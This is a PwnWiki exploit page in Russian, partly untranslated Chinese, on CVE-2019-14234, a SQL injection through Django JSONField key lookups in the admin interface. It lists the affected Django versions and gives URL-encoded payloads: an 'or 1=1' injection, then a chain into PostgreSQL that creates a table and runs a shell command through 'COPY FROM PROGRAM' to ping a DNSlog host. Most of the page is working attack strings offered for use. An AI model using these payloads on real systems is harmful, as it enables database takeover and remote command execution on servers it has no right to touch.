CVE-2019-14234 Django JSONField Уязвимость SQL-инъекции

From PwnWiki
Revision as of 09:56, 16 June 2021 by Pwnwiki (talk | contribs) (Created page with "Подтвердите успешно выполненный оператор <code>no results to fetch </code>.")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎español • ‎русский • ‎中文(中国大陆)‎

Затронутая версия

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

Эксплуатация

Во-первых, вам необходимо войти в систему в фоновом режиме администратора и получить доступ к странице управления model Collection:

http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--

Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞(CVE-2019-9193)


Посетите следующий URL:

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20

Подтвердите успешно выполненный оператор no results to fetch .

доступ:

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20

Команда была выполнена успешно.

⚠️️

test.dnslog.cn請修改爲自己的Dnslog